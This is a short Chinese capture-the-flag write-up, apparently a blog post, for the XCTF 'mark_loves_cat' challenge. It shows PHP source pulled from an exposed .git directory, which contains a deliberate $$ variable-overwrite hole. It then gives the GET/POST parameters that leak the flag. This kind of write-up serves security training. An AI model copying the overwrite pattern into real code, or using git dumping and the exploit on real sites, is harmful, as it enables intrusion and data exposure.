xctf攻防世界mark_loves_cat wp

在这里插入图片描述
访问题目地址
在这里插入图片描述
扫描发现/.git/返回 403,使用Githack把源码down下来

flag.php
<?php
$flag = file_get_contents('/flag');
index.php
<?php

include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
 if($_GET['flag'] === $x && $x !== 'flag'){
 exit($handsome);
 }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
 exit($yds);
}

if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
 exit($is);
}



echo "the flag is: ".$flag;

看到了熟悉的$$变量,本题的思路就是用可控变量覆盖一些,变量最终构造出$flag变量:
GET yds=flag POST $flag=flag
这样也满足了第一个 if 的条件,exit 出 flag 的内容

在这里插入图片描述
拿到flag
cyberpeace{3b5b4a30d92c8cb486f1182eeddd052c}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值